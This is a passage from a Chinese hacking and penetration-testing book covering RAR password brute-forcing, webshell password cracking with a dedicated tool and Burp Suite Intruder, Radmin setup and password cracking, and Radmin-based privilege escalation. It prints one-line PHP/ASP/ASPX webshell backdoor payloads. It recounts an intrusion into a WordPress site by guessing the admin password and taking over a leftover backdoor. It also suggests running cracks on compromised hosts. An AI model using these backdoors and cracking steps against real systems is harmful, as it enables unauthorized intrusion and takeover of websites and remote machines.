ARPR可以在命令行模式进行破解。命令“arpr.exe /a:b /c:cs /min:2 /max:5 /smartexit test.rar”表示暴力破解test.rar文件,最小密码长度为2,最大密码长度为5,破解完成后保存结果并退出。关于RAR命令行破解参数,读者可以自行参考该软件的帮助文件。 7.5.4 小结 本案例介绍了如何使用字典文件和暴力两种方式来破解RAR加密文件。ARPR可以在DOS下进行破解并保存结果,这在网络攻防过程中提供了很大的发挥空间。如果遇到难以破解的RAR加密文件,则可以分段在肉机上进行破解。
未知 7.6 一句话密码破解获取某网站WebShell 一句话后门是Web渗透中用得最多的必备工具,目前流行的一句话后门有ASP、ASP.NET、JSP和PHP 4种类型。 一句话后门利用的实质就是通过执行SQL语句、添加或者更改字段内容等操作,在数据库表或者相应字段插入“>%execute request("pass")%<”、“>%evalrequest ("pass")%<”、“>?php eval($_POST[pass])?<”、“>?php@eval($_POST[pass])?<”、“>%@ PageLanguage="Jscript"%<”、“>%eval(Request.Item["pass"],"unsafe");%<”等代码,然后通过“中国菜刀”、Lake一句话后门客户端等工具进行连接。只需要知道上述代码插入的具体文件及连接密码,即可进行一些WebShell的操作,是基于B/S结构的架构。一句话后门是黑客入侵成功的标志和常用后门,在渗透过程中,如果发现一句话后门,就可以通过对一句话后门进行破解,从而获得网站的权限。 7.6.1 获取后台权限 对某网站进行安全检测。通过WVS等扫描工具对目标站点进行扫描,没有发现可以利用的明显漏洞,通过社工猜测出网站管理员admin的密码,如图7-37所示,成功进入后台。 图7-37 登录WordPress后台 7.6.2 尝试提权 获取管理员权限后,通过查看和编辑页面内容,在页面内容中插入一句话后门代码,如图7-38所示,无法保存修改后的文件,该文件及文件夹无写权限。 图7-38 尝试向网站写入文件 在上传图像模块选择图像文件进行上传,如图7-39所示,无法上传文件。与前面一样,文件夹设置了权限,看来WordPress的常见提权方法是行不通的。 图7-39 无法上传文件 7.6.3 列目录及文件漏洞 该目标站点还存在列目录及文件漏洞,如图7-40所示,可以查看图像文件等。在“images”文件夹下发现gif.php文件,因为该文件可以通过浏览器访问,大小为27字节,所以该文件为一句话后门的可能性极高。 图7-40 列目录及文件漏洞 7.6.4 一句话密码破解 打开ASP PHP ASPX一句话密码暴力猜解工具,如图7-41所示,在“地址”文本框中输入目标网站地址,发现的一句话后门文件的地址为“http://www.somesite.com/ images/gif.php”。选择全部字符,设置位数为“3”,脚本为“php”,单击“破解”按钮,开始对一句话后门进行破解。 图7-41 对一句话后门密码进行破解 7.6.5 获取目标WebShell权限 在“中国菜刀”中新增一个后门记录,输入地址和密码,如图7-42所示,成功获取目标站点的权限。 图7-42 获取目标WebShell的权限 7.6.6 小结 通过本次渗透,我们熟悉和掌握了WordPress管理员提权的方法。在获取管理员权限后,可以通过修改页面文件插入一句话后门直接获取WebShell,还可以直接上传后门文件获取WebShell。 在权限设置严格的情况下,可以通过其他漏洞获取权限,如文件名称和目录信息泄露等。在本例中,找到早期入侵者留下的Shell,通过破解一句话后门成功获取网站权限。
未知 7.7 使用Burp Suite破解WebShell密码 Burp Suite是用于攻击Web应用程序的集成平台,其中包含许多工具,并为这些工具设计了许多接口,以加快攻击应用程序的过程。所有的工具都共享一个能处理并显示HTTP消息、持久性、认证、代理、日志、警报的强大的、可扩展的框架。Burp Suite的运行需要Java环境的支持。 7.7.1 应用场景 在渗透测试过程中,目标如果被黑客入侵过,在扫描过程中会发现入侵者留下的WebShell等,但WebShell一般都有密码,如图7-43所示。如果能够获取其密码,就能顺利进入目标系统。WebShell有一句话型的,也有大马型的,本例中为大马。 图7-43 WebShell大马 7.7.2 安装与设置 Proxy(代理)是拦截HTTP/S的代理服务器,可作为浏览器和目标应用程序的中间人,允许使用者拦截、查看、修改两个方向上的原始数据流。 01 设置代理服务器 确认安装了Java环境后,打开浏览器进行设置。对IE浏览器,如图7-44所示,依次单击“设置”→“Internet选项”→“连接”→“局域网设置”→“代理服务器”选项,设置地址为127.0.0.1,端口为8080。对Chrome浏览器,则依次单击“设置”→“高级设置”→“网络”→“更改代理服务器设置”选项进行设置。 02 查看Burp Suite代理状态 运行Burp Suite,依次单击“Proxy”→“Options”选项,如图7-45所示,代理端口是8080,状态为正在运行。为浏览器设置代理后,就可以成功抓取浏览器数据了。 图7-44 设置IE浏览器 图7-45 查看Burp Suite的设置状态 03 拦截设置 在“Proxy”标签页单击“Intercept”标签,然后单击“Intercept is on”按钮,开始进行拦截,如图7-46所示。此时,“Intercept is on”按钮会变成“Intercept is off”按钮,单击“Intercept is off”按钮表示关闭拦截。单击“Forward”按钮表示放行,单击“Drop”按钮表示丢弃。 图7-46 拦截设置 7.7.3 破解WebShell的密码 接下来就可以破解WebShell的密码了。 01 抓取密码信息 打开目标WebShell的地址http://127.0.0.1/90sec.php,先随意输入一个密码,提交后在Burp Suite中单击“Forward”按钮对拦截进行放行。Burp Suite抓到了两个数据包,第一个是浏览器访问Shell所发出的GET请求包,第二个是输入密码之后发送的POST请求包。选中“Method”列为“POST”的记录,单击鼠标右键,在弹出的快捷菜单中选择“Send to Intruder”选项,把第二个POST请求包发送到“Intruder”(入侵者)标签页进行破解,如图7-47所示。 图7-47 将包发送到Intruder标签页 02 设置密码参数 在“Positions”标签页设置“Attack Type”(功能类型)为默认值“Sniper”,选中Cookie,单击“clear$”按钮,去掉其中的“$”符号,然后单击“Add$”按钮,增加破解密码的参数,如图7-48所示。需要将密码前面的值去掉,同时清除Cookie内容“ASPSESSIONIDCATBRDTD =EMPJNHNALLEHBHIKGGFGENCM”后面的“$”符号。 图7-48 设置破解密码的参数 03 设置破解密码字典 单击“Payloads”标签页,这里有密码字典的一些配置项。单击“Clear”按钮清除之前的密码字典设置,然后单击“Load…”按钮,从文件导入密码。如图7-49所示,已经导入了密码字典。 图7-49 设置密码字典 04 设置密码,提交错误过滤信息 单击“Options”标签页,该页主要设置错误信息的过滤规则,也就是说,如果是错误结果的则继续进行破解。这里需要针对不同的情况进行设置。如图7-50所示,单击“Clear”按钮清除默认设置。 图7-50 设置过滤信息 在WebShell地址中输入任意密码,如图7-51所示,获取信息错误的反馈页面,并获取错误关键字“密码错误不能登录!”。 图7-51 获取错误关键字 在“Add”按钮后的文本框中输入关键字并单击该按钮,如图7-52所示,密码暴力破解设置完成。 图7-52 添加过滤关键字 05 破解WebShell密码 依次单击“Intruder”→“Start Attack”选项开始进行攻击测试,在攻击响应页面中可以看到前面所设置的密码发送的每一个请求,在“Status”列会返回状态代码。如图7-53所示,密码“00sujung”即为WebShell密码。 图7-53 成功破解WebShell密码 状态反馈代码的具体含义如下。 200:返回正常,即服务器接受了我们的请求并返回响应结果,通常说明这个页面是存在的,发送的请求是被允许的。 302:返回错误,即服务器接受了我们的请求,但是需要更多操作来获取返回结果。例如,跳转到新的页面时,因为我们都知道Shell密码输入后会跳转到响应的功能页面,所以就会产生这样的错误。 06 成功获取WebShell 在WebShell密码框中输入刚才破解出来的密码“00sujung”,成功登录WebShell,如图7-54所示,成功破解WebShell密码。 图7-54 成功获取WebShell
在Radmin 3.0以前的版本中,杀毒软件都不对其进行查杀,后期,由于黑客和病毒大量使用R_server作为媒介,因此将R_server作为安全威胁处理。 目前,一些以主动防御为主的杀毒软件及防火墙会主动将R_server列入黑名单。
7.8.1 Radmin简介 “Radmin”是“Remote Administrator”的简称,其官方网站(http://www.radmin.com)的解释为“PC Remote Control Software and Remote Access Software”(PC远程控制和远程访问软件)。 Radmin是一款屡获殊荣的远程控制软件,目前新版本为3.4,它将远程控制、外包服务组件及网络监控整合到一个系统里,提供目前为止最快速、最强健且最安全的工具包。 1.主要特点 (1)最高工作速度 Radmin是目前速度最快的远程控制软件,其Direct Screen Transfer?技术采用了视频挂钩内核模式驱动程序,将捕捉率提高到每秒数百次屏幕更新。
(2)最高安全级别 Radmin以加密模式工作,为所有连接到远程计算机的数据、屏幕图像、鼠标移动和键盘信号采用随机生成的密钥256位AES强加密,而且可以使用Windows Security或Radmin Security。
Windows安全性支持对特定用户使用不同的权限,或者对主域、可信域和活动目录的用户组使用不同的权限,支持自动使用登录用户凭证和Kerberos验证。
(3)硬件支持英特尔 ® AMT新产品远程控制 Radmin 3.4支持英特尔 ® AMT(主动管理技术),它允许进行远程计算机控制(即使是关闭或无法启动操作系统)。
可以使用Radmin浏览器打开、重新启动和关闭远程计算机。 Radmin还能使用户查看和修改远程计算机的BIOS设置,并从本地CD或磁盘映像文件启动远程计算机。
(4)全面兼容Windows 7新功能 Radmin 3.4完全支持Windows 7 32位和64位操作系统,包括用户账户控制和快速用户切换。 Radmin 3.4的服务端支持Windows 7/Vista/XP/2008/2003/2000(32位)和Windows 7/Vista/XP/2008/2003(64位)操作系统。 Radmin 3.4的浏览器端支持Windows 7/Vista/XP/2008/2003/2000/Me/98/95/NT4.0(32位)和Windows 7/Vista/XP/2008/2003(64位)操作系统。 (5)操作简单,支持多连接 Radmin支持被控端以服务的方式运行,支持多个连接和IP地址过滤(即允许特定的IP地址控制远程机器)、个性化的文档互传、远程关机,支持高分辨率模式、基于Windows NT的安全支持和密码保护,以及提供日志文件等。 Radmin目前支持TCP/IP协议,应用十分广泛。
2.软件组成 Radmin分为服务端(Radmin Server)和浏览器端(Radmin Viewer)两个部分,在早期版本中,这两个部分是集成在一起的,在Radmin 3.0以后就将其分开了。 浏览器端即Radmin.exe,服务端即早期的R_server.exe。
服务端主程序由“R_server.exe”更名为“rserver3.exe”,其安装文件路径由“C:\Program Files\Radmin”变为“C:\ WINDOWS\system32\rserver30”,共有25个主要程序文件。
2.服务端详细设置 01 设置主窗口 依次单击“开始”→“程序”→“Radmin Server 3”→“Setting For Radmin Server”选项,进入Radmin Server设置窗口,如图7-55所示。
图7-55 Radmin Server设置窗口 02 输入注册码 在设置窗口中单击“Enter license”按钮,在弹出的“License Code”对话框中输入注册码,否则在30天试用期结束后,客户端将无法连接服务端,需要输入正确的注册码后才能使用,如图7-56所示。 03 设置Radmin Server选项 在设置窗口中单击“Options…”按钮,会打开一个选项设置窗口,如图7-57所示。
在该窗口中,有“General”(普通)、“Miscellaneous”、“IP Filter”(IP地址过滤)、“Language”(语言)、“Chat Options”(聊天选项)和“ Voice Chat Options”(语音聊天选项)六大功能。
图7-56 输入注册码 图7-57 选项设置窗口 (1)普通设置 在普通设置中,有“Port”(端口)、“Tray icon”(托盘图标)、“Incoming connection dialog”(连接对话框)和“Logging”(日志)四大选项。
Radmin Server的默认端口为“4899”,如果需要更改该端口为自定义的未使用端口,可以取消勾选“Use default port”,同时在下面的输入框中输入自定义的端口号。
“Incoming connection dialog”选项主要用于设置用户访问许可,有两种方式供用户选择,一种是访问超时后自动拒绝访问,另一种是超时后自动允许访问,默认为第一种方式。
在默认情况下,日志记录文件为C:\WINDOWS\ system32\rserver30\Radm_log.htm,用户可以根据实际情况重新设定记录日志文件的位置及名称。 日志设置完毕,客户端连接或者服务端启动等信息都会详细记录在Radm_log.htm文件中。
图7-58 日志详细记录 (2)“Miscellaneous”设置 “Miscellaneous”设置非常有用,如图7-59所示,需要禁用哪个功能,就选中该功能前的复选框即可。
Disable Remote Screen Control:禁用远程屏幕控制功能,即禁用完全控制功能。 Disable Remote Screen View:禁用远程屏幕浏览功能。 Disable File Transfer:禁用文件传输功能。 Disable Telnet:禁用Telnet功能。 Disable Redirect:禁用重定向功能。
Disable Shutdown:禁用关闭计算机功能。 Disable Text Chat:禁用文本聊天功能。 Disable Audio Chat:禁用语音聊天功能。 Disable Send Message:禁用发送消息功能。
如图7-60所示,在“IP Filter”设置中勾选“Enable IP Filter”复选框,接着单击“Add”按钮,添加允许的IP地址或者IP地址范围。 对于已经添加的IP地址或者范围,如果不再使用或者不再允许访问,只要选中后单击“Remove”按钮将其移除即可。
图7-59 Miscellaneous设置 图7-60 设置IP过滤 (4)语言设置 尽管Radmin官方声称支持多种语言,但实际测试中发现并非如此,也许是因为缺少相应的语言文件吧。
如图7-61所示,如果使用聊天功能,则可以设置服务端聊天显示的昵称,在“Nick name”文本框中输入昵称即可,默认昵称是“user”,在“User information”文本框中可以填写简单的用户介绍。
在Radmin中,还可以对聊天界面的外观进行设置,如图7-62所示,可以设置聊天文字样式等。 图7-61 聊天设置 图7-62 设置聊天外观 在“Additional”(附加)选项中,可以设置是否显示自己的昵称、每一条消息发送的时间戳,是否对聊天发起方连接及断开的确认,是否允许使用特殊的命令,以及是否记录聊天日志等,如图7-63所示。 (6)语音聊天设置 语音聊天设置与聊天设置类似,如图7-64所示,唯一不同的是需要设置声卡设备。 图7-63 聊天附加选项设置 图7-64 语音聊天设置 04 安全许可设置 Radmin中的“Permissions”是最重要的设置之一。
如图7-66所示,单击“Add User”按钮添加一个用户后,再进行详细设置。 如果是完全访问,则勾选“All Access”复选框即可,否则应根据实际需要进行选择。
(2)“Windows NT Security”安全模式 图7-67 Windows NT Security设置 选择“Windows NT Security”设置后,将按照Windows用户域模式进行安全管理。 如图7-67所示,单击“添加”按钮,从Windows用户管理器中添加一个用户,然后在“Administrators的权限”设置区中进行设置。 使用“Windows NT Security”安全模式时,结合Windows文件权限管理进行更加细致的设置,即可以授予用户特别的权限。
7.8.3 Radmin的使用 打开“Radmin Viewer”窗口,如图7-68所示,该界面是Radmin客户端管理主界面,对Radmin服务端的所有操作都能在这个界面中完成。 “Radmin Viewer”窗口有一个英文菜单和工具栏,工具栏中各按钮的功能依次为连接一个地址、新建一个连接、删除连接地址、查看地址属性、屏幕完全控制、屏幕浏览、Telnet、文件传输、关闭计算机、聊天、语音聊天、发送消息、选择图标浏览方式、以文件夹方式浏览、查看在线计算机。 在Radmin Viewer中是通过IP地址来进行管理的。 1.新建连接 在“Radmin Viewer”窗口依次单击“Connection”→“New Connection”选项,或者在工具栏中单击第二个图标,即可在Radmin客户端中打开新建连接窗口。 如图7-69所示,在“IP address or DNS”文本框中输入IP地址或者DNS地址,“Name of entry”文本框中显示的是在“Radmin Viewer”窗口中显示的名称,如果是新建连接,不需要输入该名称,默认是IP地址的名称。
设置完成后,就会在Radmin客户端中以IP地址进行显示。 图7-68 Radmin客户端管理主界面 图7-69 新建一个连接 2.Telnet连接服务端 在Radmin客户端管理界面中,选中刚才新建的IP地址192.168.209.130,然后单击右键,在弹出的快捷菜单中选择“Telnet”选项。
图7-72 使用Telnet 3.文件传输 文件传输,顾名思义,就是文件的上传与下载。 Radmin文件传输的使用方式与Telnet方式类似,打开后的初始界面如图7-73所示,单击其中的盘符即可像在资源管理器中一样浏览文件,文件传输的目的地必须是具体的磁盘。
图7-73 文件传输 4.远程屏幕监控 远程屏幕监控,换句话说就是完全控制服务端计算机。 单击工具栏上的第五个图标,或者依次单击“Mode”→“Full Control”选项,即可使用远程屏幕监控。
当使用屏幕控制后,在Radmin主窗口中即可对服务端(被控制计算机)进行各种操作,就像在本地操作计算机一样。 图7-74 远程屏幕监控 5.聊天与发送短消息 相对Radmin强大的控制功能来说,其聊天与发送短消息功能就像是赠品,方便管理员进行管理与交流。
图7-75 通过Radmin聊天 图7-76 发送和接收短消息 6.Intel AMT技术 Radmin 3.2及后续版本提供了Intel AMT技术,声称可以实现冷启动、BIOS远程控制和网络启动。
1.Radmin破解文件分析 我们一起分析一下Radmin破解文件。 (1)文件组成 图7-78 Radmin破解程序密码字典 该暴力破解软件共有4个文件,分别是password.txt、radmin.exe、radmin.nfo、radmincracker.exe。 password.txt为密码字典文件,该文件可以手动修改,每个密码为单独一行,使用“记事本”程序打开后,如图7-78所示,其中包含5个密码,第一个密码为空,后面的密码依次是“radmin”、“password”、“letmein”和“admin”,该密码文件即Radmin服务端的连接密码。
(2)Radmin口令破解命令格式 使用UltraEdit软件直接编辑radmincracker.exe,使用二进制格式查看,radmincracker.exe的命令格式为“radmincracker.exe ip ip ip”,如图7-79所示。 在DOS提示符下输入“radmincracker.exe”并运行,也会提示其命令格式。 图7-79 获取Radmin破解程序的具体运行命令 (3)测试环境的搭建 在虚拟机中建立两个Windows XP操作系统(A系统和B系统),在A系统中安装Radmin 2.2,在B系统中将Radmin口令破解软件放到“Tools”文件夹下。
将sfind.exe复制到B系统中,使用“sfind -p 192.168.209.130”语句查看A系统中对外端口的开放情况,如果结果中未看到4899端口开放,可能有两个原因:一是被防火墙拦截;
可以关闭Windows防火墙或者在防火墙例外列表中添加4899端口为允许端口,然后重启A系统或者在命令提示符下使用“net start r_server”命令启动Radmin服务端。
在DOS提示符下会给出IP地址和密码的列表,当找到匹配的密码后会给出结果,在本例中显示的结果为“192.168.209.130: password successfully opened”。
破解成功后,破解程序会自动Telnet被破解的Radmin服务端,也就是说,Radmin客户端是通过Telnet方式连接的。 图7-80 口令破解测试 3.破解后续处理及技巧 Radmincracker破解程序在破解Radmin密码成功后会自动在当前文件夹下生成一个TXT文件,文件以被破解的IP地址命名,如图7-81所示,在该文件中显示格式为“IP地址:密码”。 图7-81 破解结果 Radmin破解技巧 (1)radmincracker.exe破解程序在破解时占用系统资源较多,因此,在破解时密码字典不宜太大,每一次破解密码字典以小于100KB为佳。
1.利用Radmin提权 很多Web服务器为了管理方便,都会安装一些远程控制软件进行系统和应用程序的维护。 当我们通过SQL注入等方式获得WebShell后,一旦发现系统安装了Radmin软件,那么一个比较快捷的方法就是获取Radmin的Hash值和端口等信息,然后通过Radmin_hash客户端连接工具直接连接,从而达到提权的目的。